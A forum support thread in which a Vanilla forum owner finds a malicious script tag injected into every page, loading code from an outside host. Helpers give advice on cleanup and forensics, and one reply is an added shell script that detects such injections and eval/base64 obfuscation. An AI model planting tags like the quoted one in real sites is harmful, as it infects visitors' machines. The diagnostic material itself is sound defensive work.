
PC compromised

Schryvers
edited November 2014 in Vanilla 2.0 - 2.8

When I visited my forum today, a security popup appeared from my Avast! security system on my PC saying my forum has a trojan detected on it.

And the page speed is mind-blowingly slow; the first time I loaded it, it had to wait 5 minutes on some request from a .de website...

So I checked out my source code, and I found some code after my </html> tag...

</body></html><script type="text/javascript" src="http:// babsy. cwsurf.de/sicherung/Utherverse/hwhbfxcl.php?id=2332630"></script>

I didn't place that there, and I also can't find it in my default.master.tpl or elsewhere...

Whatttttt is this? The last thing I did was update from 2.1.3 to 2.1.5....

The website is tattootalk.nl (so, let's be careful; my computer says it has a trojan, but does not block the entire website...)

Anyone?


Answers

  • peregrine MVP
    edited November 2014

    Are you using any insecure plugins that you have been told not to use? Or using cleditor in an insecure way?

    Perhaps your computer is infected and you infected your forum.

    Ask your host if they can see how you were infected. They provide support relating to this.

    the "free advice" I can give.

    I may not provide the completed solution you might desire, but I do try to provide honest suggestions to help you solve your issue.

  •

    Yes, I'm using that poll plugin?

  •

    Something strange happened!!! My Shoutbox doesn't work anymore.......... I didn't change anything for at least a week and everything worked smoothly yesterday.

  • peregrine MVP
    edited November 2014

    Ask your host to restore, only use secure versions of Vanilla software, clean your local PC, and don't use insecure plugins.

    I may not provide the completed solution you might desire, but I do try to provide honest suggestions to help you solve your issue.

  •

    Shitttt! But who says it comes from either the shoutbox or poll plugin?

    I can't get rid of it; I disabled them both but the code is still there after the </html> tag.

    My host to restore? Can they do that? :\

  • x00 MVP
    edited November 2014

    It could be, as peregrine says, that your computer or some other computer that has access to your server is infected and then uploads the payload, piggybacking your session. This is particularly a possibility if you keep getting reinfected.

    Post an example of the code. Does it have base64_decode, eval, etc.?

    Or, in general, your server security is compromised, then you can .

    There were a couple of very serious security vulnerabilities in Linux systems that could be used to do pretty much anything if they didn't update the OS.

    I doubt it is from XSS in the forum software itself; I know a fair bit about this.

    grep is your friend.

  • x00 MVP
    edited November 2014

    You are almost certainly going to need to replace all those files, but if you don't find the source you may be infected again.

    If your file permissions are set correctly, then the infection is more likely to be using you, or someone with your level of privileges, to infect the files.

    grep is your friend.

  • Schryvers
    edited November 2014

    I can't get the code here, so I'm posting an image.

    This script tag after the html gets included on every page... but I don't know if that's the trojan, because my trojan warning says something like 3842349library{gzip}, but I don't get that trojan message anymore, only the first time I loaded the site...

    I'm using Windows XP, SP3... is that important? My computer scan says there are no infections or whatever on my PC.

    [image attachment: test.jpg, 143.2K]
  • x00 MVP
    edited November 2014

    Yes, your files are likely infected.

    Try looking in files such as index.php and compare with a clean copy.

    grep is your friend.
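    The triage x00 and peregrine describe (grep for the injected tag and for base64_decode/eval, then compare the tree with a clean copy of the same release) as three shell functions. This is an added example, not code from the thread or from Vanilla; the web root, file names and hostile URL are constructed in a temp dir for the demonstration.

```shell
#!/bin/sh
# Added example (not from the thread or Vanilla): triage helpers for an
# injected <script> tag, obfuscated PHP, and files differing from a clean copy.

# Files in which a <script> tag appears after the closing </html> tag, the
# symptom Schryvers posted; awk is used so a tag on a later line is found too.
find_injected_tail() {
    find "$1" -type f \( -name '*.php' -o -name '*.tpl' -o -name '*.html' \) |
    while read -r f; do
        if awk '/<\/html>/ { seen = 1 }
                seen && /<script/ { found = 1; exit }
                END { exit !found }' "$f"; then
            echo "$f"
        fi
    done
}

# PHP files calling the obfuscation primitives x00 asks about.
# A clean tree legitimately has none, so "no match" is not an error here.
find_suspicious_php() {
    grep -rlE --include='*.php' 'base64_decode[[:space:]]*\(|eval[[:space:]]*\(' "$1" || true
}

# Files that differ from, or are absent in, a known-clean copy of the release
# (first argument: live web root, second: clean copy).
diff_against_clean() {
    diff -rq "$2" "$1" | sed -n -e 's/^Files .* and \(.*\) differ$/\1/p' \
                                -e 's/^Only in \(.*\): \(.*\)$/\1\/\2/p'
}

# Constructed sample: a clean release copy next to an "infected" web root.
# The hostile URL and file names are made up for the demonstration.
make_sample_tree() {
    base=$(mktemp -d)
    mkdir -p "$base/clean/plugins" "$base/infected/plugins"
    printf '<?php echo "vanilla";\n' | tee "$base/clean/index.php" > "$base/infected/index.php"
    printf '<html><body>x</body></html>\n' > "$base/clean/default.master.tpl"
    printf '<html><body>x</body></html>\n<script src="http://evil.invalid/x.php"></script>\n' \
        > "$base/infected/default.master.tpl"
    printf '<?php eval(base64_decode("aGk="));\n' > "$base/infected/plugins/dropper.php"
    echo "$base"
}

root=$(make_sample_tree)
echo "injected tail:";       find_injected_tail "$root/infected"
echo "suspicious php:";      find_suspicious_php "$root/infected"
echo "differs from clean:";  diff_against_clean "$root/infected" "$root/clean"
rm -rf "$root"
```

    Run it against the real web root and a freshly downloaded copy of the same Vanilla release; every file the third function lists is one to replace, and anything the first two list is what to examine before restoring.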

  •

    If you find it, can you please not screenshot it. Instead, put the code like so:

    ~~~
    [code here]
    ~~~
    

    Screenshots of text drive me up the wall.

    grep is your friend.

  • peregrine MVP
    edited November 2014

    I don't know why you are changing the discussion title.

    If your goal is to bring your forum back,

    you need to re-install version 2.1.5, if you are not re-infecting your host from your local PC.

    If you don't have a trojan or virus, reinstalling 2.1.5 won't hurt.

    As well as that, talk to your host about server OS vulnerabilities as x00 suggested.

    If your goal is to find out what may have happened, zip up your forum folder and explore it later, being careful not to re-infect.

    I may not provide the completed solution you might desire, but I do try to provide honest suggestions to help you solve your issue.

  •

    @Linc can you change the title of this discussion to something more descriptive? Thanks

    grep is your friend.

  •

    WOW I didn't change that!!!!!!

  •

    I didn't change that title! What is going on, is my PC infected?

  •

    @Schryvers said:
    WOW I didn't change that!!!!!!

    Perhaps someone now has your login name and password for Vanilla Forums, if a moderator didn't change the title and you didn't.

    I suggest that after you bring your forum back online, you change all passwords to the database as well as admin passwords. And if someone has compromised your login and passwords for other sites, change them as well.

    I may not provide the completed solution you might desire, but I do try to provide honest suggestions to help you solve your issue.

  •

    grep is your friend.

  •

    I didn't change it into "PC compromised", not !!!!!!!

  • Linc Detroit Admin
    edited November 2014

    I edited the title as requested by x00. Calm down.

  •

    I changed my pass here on the site.

  • peregrine MVP
    edited November 2014

    @Linc said:
    I edited the title as requested by x00. Calm down.

    But who edited it to hgtonight's email address is the big question.

    I may not provide the completed solution you might desire, but I do try to provide honest suggestions to help you solve your issue.
